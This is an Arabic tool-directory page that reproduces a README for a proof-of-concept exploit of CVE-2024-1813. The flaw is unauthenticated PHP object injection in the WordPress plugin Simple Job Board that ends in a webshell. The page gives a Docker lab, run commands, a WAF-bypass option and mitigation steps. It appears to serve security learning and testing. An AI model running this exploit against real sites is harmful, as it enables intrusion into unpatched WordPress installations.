Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-1813-POC | Kitploit
أدوات/GitHubGitHub/mobetasec/cve-2024-1813-poc
تحليل الثغرات الأمنيةاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليمتطوير الحمولاتمختبرات وتدريب عملي
GitHubmobetasec/cve-2024-1813-poc

CVE-2024-1813-POC

عرض المستودع
منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-1813 - Simple Job Board ≤ 2.11.0 (WordPress) - حقن كائنات PHP دون مصادقة

🎥 عرض إثبات المفهوم

من البداية إلى النهاية: يخزّن زائر كائن PHP مُسلسَلًا عبر نموذج التقديم العام، ثم يفتح المدير قائمة المتقدمين، فتُسقط سلسلة الأدوات (gadget chain) قشرة ويب (webshell).

CVE-2024-1813 PoC demo

حقن كائنات PHP دون مصادقة في إضافة ووردبريس Simple Job Board (من PressTigers). يخزّن زائر كائن PHP مُسلسَلًا عبر نموذج التقديم العام؛ وعندما يفتح المدير لاحقًا قائمة المتقدمين، تقوم الإضافة بإلغاء تسلسله (unserialize) وتحوّله سلسلة أدوات تابعة لجهة خارجية إلى تنفيذ تعليمات برمجية عن بُعد.

CVECVE-2024-1813
الإضافةSimple Job Board (PressTigers)
الإصدار المعرّض≤ 2.11.0
الإصدار المُصحَّح2.11.1
النوعحقن كائنات PHP (إلغاء تسلسل غير آمن)
المصادقةلا شيء (حقن قبل المصادقة)
المحفّزفتح المدير لقائمة المتقدمين (سير عمل عادي)
CVSS9.8

📖 الشرح الفني الكامل: https://mobeta.fr/blog/

هذا المستودع هو المختبر المرافق وإثبات المفهوم (PoC). التحليل المفصّل (السبب الجذري، وunserialize المزدوج، وبناء سلسلة POP، وتجاوز WAF) موجود في مقالة المدونة.

المتطلبات

  • Python 3.7+ لإثبات المفهوم - المكتبة القياسية فقط، دون الحاجة لتثبيت أي حزم.
  • Docker + Docker Compose للمختبر.

هيكل المستودع

root@kitploit:~
.
├── sjb_cve_2024_1813.py     # the PoC (builds + sends the payload)
├── LICENSE
└── lab/
    ├── docker-compose.yml   # WordPress + MariaDB + vulnerable plugins
    ├── setup/setup.sh        # one-shot provisioning (wp-cli)
    └── trigger_exploit.sh    # simulates the admin opening the applicants list

المختبر

يعيد إنتاج البيئة المعرّضة للخطر: WordPress 6.9.4 / PHP 8.3 / MariaDB 10.11 مع Simple Job Board 2.10.8 (المصدر + الحوض) وAll In One SEO 4.5.6 (سلسلة الأدوات).

root@kitploit:~
cd lab
docker compose up -d            # boot + auto-provision
docker compose logs setup       # prints the site URL, admin creds and job_id

البيانات الافتراضية للمختبر: http://localhost:8081، المدير admin / admin123!.

تشغيل الاستغلال

root@kitploit:~
# 1. Store the payload (pre-auth). Replace 4 with the job_id from the setup logs.
python3 sjb_cve_2024_1813.py http://localhost:8081 4 'id > /tmp/RCE_PROOF.txt'

# 2. Fire the sink (plays the admin opening the applicants list).
cd lab && ./trigger_exploit.sh

# 3. Check the result.
docker exec sjb_lab_wp cat /tmp/RCE_PROOF.txt

خيارات مفيدة لإثبات المفهوم (PoC):

  • --print-only - بناء الحمولة المرسلة عبر الشبكة وطباعتها دون أي حركة مرور شبكية.
  • --field - اسم حقل POST (يجب أن يحتوي على name؛ الافتراضي jobapp_full_name).
  • --int-prefix '+' - صيغة مختلفة لتجاوز WAF لبادئة الطول في البيانات المُسلسَلة.
  • --proxy http://127.0.0.1:8080 - التوجيه عبر Burp.

التخفيف

  • حدّث Simple Job Board إلى ≥ 2.11.1.
  • راجع أي استدعاء صريح لـ unserialize() / maybe_unserialize() على post_meta؛ وفضّل استخدام unserialize($data, ['allowed_classes' => false]).
  • امنع الوصول المباشر إلى vendor/composer/installed.json بحيث لا يمكن التعرف على إصدارات المكتبات المعزولة (scoped) عبر البصمة الرقمية.
  • أزل الإضافات غير المستخدمة التي تكشف أدوات POP (Monolog, Guzzle, Symfony, …).

المراجع

  • WPScan: https://wpscan.com/vulnerability/600cb9cf-2e93-4927-b449-edd7edf186d2/
  • Wordfence: https://www.wordfence.com/threat-intel/vulnerabilities/id/89584034-4a93-42a6-8fef-55dc3895c45c
  • فرق التصحيح SVN من 2.10.8 إلى 2.11.1: https://plugins.trac.wordpress.org/changeset?new=3051715%40simple-job-board&old=3038476%40simple-job-board
  • PHPGGC (سلاسل Monolog): https://github.com/ambionics/phpggc

إخلاء المسؤولية

للاستخدام في اختبارات الأمان المصرَّح بها والأغراض التعليمية فقط. لا تشغّل هذا أبدًا ضد أي نظام دون إذن كتابي صريح من مالكه.

الترخيص

MIT - انظر LICENSE.

تنزيل الأداة